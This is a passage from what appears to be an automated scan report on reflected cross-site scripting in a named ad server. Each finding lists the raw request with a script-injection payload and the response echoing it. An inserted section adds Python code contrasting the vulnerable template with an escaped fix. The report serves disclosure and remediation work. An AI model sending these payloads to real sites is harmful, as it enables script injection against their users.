Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 290

<html><body><base target=23a02><script>alert(1)</script>84b2b0ffe6a><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CAD
...[SNIP]...

2.69. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac568"><script>alert(1)</script>445b737e7e was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]ac568"><script>alert(1)</script>445b737e7e HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 293

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]ac568"><script>alert(1)</script>445b737e7e;adiframe=y">
...[SNIP]...

2.70. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df345"><script>alert(1)</script>bd058dcb6b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECHdf345"><script>alert(1)</script>bd058dcb6b3;target=_blank;kvg=528;kvi=US_FL;grp=[36993428] HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECHdf345"><script>alert(1)</script>bd058dcb6b3;target=_blank;kvg=528;kvi=US_FL;grp=[36993428];adiframe=y">
...[SNIP]...

2.71. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62c2"><script>alert(1)</script>47db9872ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&c62c2"><script>alert(1)</script>47db9872ba7=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&c62c2"><script>alert(1)</script>47db9872ba7=1;adiframe=y">
...[SNIP]...

2.72. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2786"><script>alert(1)</script>40b84c3f202 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]c2786"><script>alert(1)</script>40b84c3f202 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]c2786"><script>alert(1)</script>40b84c3f202;adiframe=y">
...[SNIP]...

2.73. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload cf8d5><script>alert(1)</script>1317b9c8006 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH;target=cf8d5><script>alert(1)</script>1317b9c8006 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 290

<html><body><base target=cf8d5><script>alert(1)</script>1317b9c8006><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CAD
...[SNIP]...

2.74. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403936|0|225|ADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403936|0|225|ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce18d"><script>alert(1)</script>d45c1675446 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403936|0|225|ADTECHce18d"><script>alert(1)</script>d45c1675446 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 233

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403936|0|225|ADTECHce18d"><script>alert(1)</script>d45c1675446;adiframe=y">
...[SNIP]...

2.75. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403936|0|225|ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403936|0|225|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45421"><script>alert(1)</script>36b2f6b585b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403936|0|225|ADTECH?45421"><script>alert(1)</script>36b2f6b585b=1 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 236

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403936|0|225|ADTECH?45421"><script>alert(1)</script>36b2f6b585b=1;adiframe=y">
...[SNIP]...

2.76. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403936|0|225|ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403936|0|225|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3a09"><script>alert(1)</script>28c78281f47 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403936|0|225|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]e3a09"><script>alert(1)</script>28c78281f47 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 282

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403936|0|225|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]e3a09"><script>alert(1)</script>28c78281f47;adiframe=y">
...[SNIP]...

2.77. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403936|0|225|ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403936|0|225|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 2fd4c><script>alert(1)</script>bc913fe8b87 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403936|0|225|ADTECH;target=2fd4c><script>alert(1)</script>bc913fe8b87 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 278

<html><body><base target=2fd4c><script>alert(1)</script>bc913fe8b87><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403936|0|225|ADTECH;target=
...[SNIP]...
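Findings 2.74 to 2.77 (and their %7C-encoded counterparts above) all come back in one fixed shell: <base target=...> followed by a <script> whose src is the addyn URL with everything after adiframe in the request path appended, plus ;adiframe=y. Whatever follows ADTECH, the ;target= path parameter, or a query string is copied in unescaped, and target defaults to _top when the parameter is absent. The Python below is an added example, not the ad server's code: it rebuilds that shell as render_unsafe, so the page's own payloads reproduce the responses shown, and puts a corrected render_safe beside it that quotes and HTML-escapes every attribute value and restricts target to an allow-list of browsing-context names. The parse of ;target=, the helper names and the allow-list are assumptions reconstructed from the visible responses only.

```python
# Added example (not the ad server's code): the responses on this page show one
# fixed shell, <base target=...><script src="...addyn<rest>;adiframe=y">, into
# which everything after "adiframe" in the request path (including any
# ";target=" path parameter and any query string) is copied verbatim. The
# renderer below reproduces that shape so the fix can be shown beside it; the
# function names, the parse of ";target=" and the allow-list are this example's
# own assumptions, reconstructed from the observed responses only.
import html
import re

AD_BASE = "http://adserver.adtechus.com/addyn"

# Browsing-context names a <base target> legitimately carries. The page shows
# only _top and _blank; the extra pattern admits a plain named window.
_TARGET_OK = re.compile(r"^(?:_blank|_self|_top|_parent|[A-Za-z][A-Za-z0-9_-]{0,63})$")


def parse_target(rest: str) -> str:
    """Observed behaviour: a ';target=...' path parameter sets <base target>;
    without one the server emits _top (finding 2.74)."""
    for part in rest.split(";")[1:]:
        name, _, value = part.partition("=")
        if name == "target":
            return value
    return "_top"


def render_unsafe(rest: str) -> str:
    """Shape of the vulnerable response: both attribute values are interpolated
    raw, target unquoted, src double-quoted but unescaped."""
    return (f"<html><body><base target={parse_target(rest)}>"
            f'<script language="JavaScript" type="text/javascript" '
            f'src="{AD_BASE}{rest};adiframe=y">')


def render_safe(rest: str) -> str:
    """Hardened shape: every attribute value is quoted and HTML-escaped, and
    target is reduced to an allow-listed browsing-context name."""
    target = parse_target(rest)
    if not _TARGET_OK.match(target):
        target = "_top"
    # html.escape(quote=True) rewrites & < > " ' as entities, so no value can
    # close the quoted attribute or start a tag, whatever the path contained.
    src = html.escape(f"{AD_BASE}{rest};adiframe=y", quote=True)
    return (f'<html><body><base target="{html.escape(target, quote=True)}">'
            f'<script language="JavaScript" type="text/javascript" src="{src}">')


def script_tags(doc: str) -> int:
    """Number of <script start tags in the output: exactly one is expected."""
    return doc.lower().count("<script")


# Payloads as sent in findings 2.74 (REST URL parameter 1) and 2.77 (unquoted
# target parameter), i.e. the part of the request path after "adiframe".
REST_PARAM_PAYLOAD = '|3.0|5310.1|1403936|0|225|ADTECHce18d"><script>alert(1)</script>d45c1675446'
TARGET_PAYLOAD = '|3.0|5310.1|1403936|0|225|ADTECH;target=2fd4c><script>alert(1)</script>bc913fe8b87'

if __name__ == "__main__":
    for rest in (REST_PARAM_PAYLOAD, TARGET_PAYLOAD):
        print("unsafe:", script_tags(render_unsafe(rest)), "script tags")
        print("safe:  ", script_tags(render_safe(rest)), "script tag")
        print(render_safe(rest))
```

Escaping fixes the attribute-context injection only; rest still reaches the addyn URL as sent, so a server-side fix should also validate the path against the expected pipe-delimited placement format before building any URL from it. The report lists the raw | and %7C spellings of each path as separate findings, but the responses have the same shape, so one fix in the template covers both.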

2.78. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403940|0|225|ADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403940|0|225|ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6c42"><script>alert(1)</script>e423f98986 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403940|0|225|ADTECHd6c42"><script>alert(1)</script>e423f98986 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 232

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403940|0|225|ADTECHd6c42"><script>alert(1)</script>e423f98986;adiframe=y">
...[SNIP]...

2.79. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403940|0|225|ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403940|0|225|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d43f"><script>alert(1)</script>1c76bda1778 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403940|0|225|ADTECH?6d43f"><script>alert(1)</script>1c76bda1778=1 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 236

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403940|0|225|ADTECH?6d43f"><script>alert(1)</script>1c76bda1778=1;adiframe=y">
...[SNIP]...

2.80. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403940|0|225|ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403940|0|225|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f2a6f><script>alert(1)</script>8e8573dfda4 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403940|0|225|ADTECH;target=f2a6f><script>alert(1)</script>8e8573dfda4 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 278

<html><body><base target=f2a6f><script>alert(1)</script>8e8573dfda4><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403940|0|225|ADTECH;target=
...[SNIP]...

2.81. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403940|0|225|ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403940|0|225|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd610"><script>alert(1)</script>29d106ecc94 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403940|0|225|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]cd610"><script>alert(1)</script>29d106ecc94 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 282

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403940|0|225|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]cd610"><script>alert(1)</script>29d106ecc94;adiframe=y">
...[SNIP]...

2.82. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403944|0|170|ADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403944|0|170|ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4437"><script>alert(1)</script>433a8f59407 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403944|0|170|ADTECHb4437"><script>alert(1)</script>433a8f59407 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 233

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403944|0|170|ADTECHb4437"><script>alert(1)</script>433a8f59407;adiframe=y">
...[SNIP]...

2.83. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403944|0|170|ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403944|0|170|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da704"><script>alert(1)</script>a7fa24a3079 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403944|0|170|ADTECH?da704"><script>alert(1)</script>a7fa24a3079=1 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 236

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403944|0|170|ADTECH?da704"><script>alert(1)</script>a7fa24a3079=1;adiframe=y">
...[SNIP]...

2.84. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403944|0|170|ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403944|0|170|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e7f4a><script>alert(1)</script>713a8b0ffb8 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403944|0|170|ADTECH;target=e7f4a><script>alert(1)</script>713a8b0ffb8 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 278

<html><body><base target=e7f4a><script>alert(1)</script>713a8b0ffb8><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403944|0|170|ADTECH;target=
...[SNIP]...

2.85. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403944|0|170|ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403944|0|170|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a402"><script>alert(1)</script>c6499242c01 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403944|0|170|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]7a402"><script>alert(1)</script>c6499242c01 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 282

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403944|0|170|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]7a402"><script>alert(1)</script>c6499242c01;adiframe=y">
...[SNIP]...

2.86. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403971|0|154|ADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403971|0|154|ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be529"><script>alert(1)</script>32ccf94e922 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403971|0|154|ADTECHbe529"><script>alert(1)</script>32ccf94e922 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 233

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403971|0|154|ADTECHbe529"><script>alert(1)</script>32ccf94e922;adiframe=y">
...[SNIP]...

2.87. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403971|0|154|ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403971|0|154|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfde3"><script>alert(1)</script>86feb4edcdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403971|0|154|ADTECH?dfde3"><script>alert(1)</script>86feb4edcdc=1 HTTP/1.1
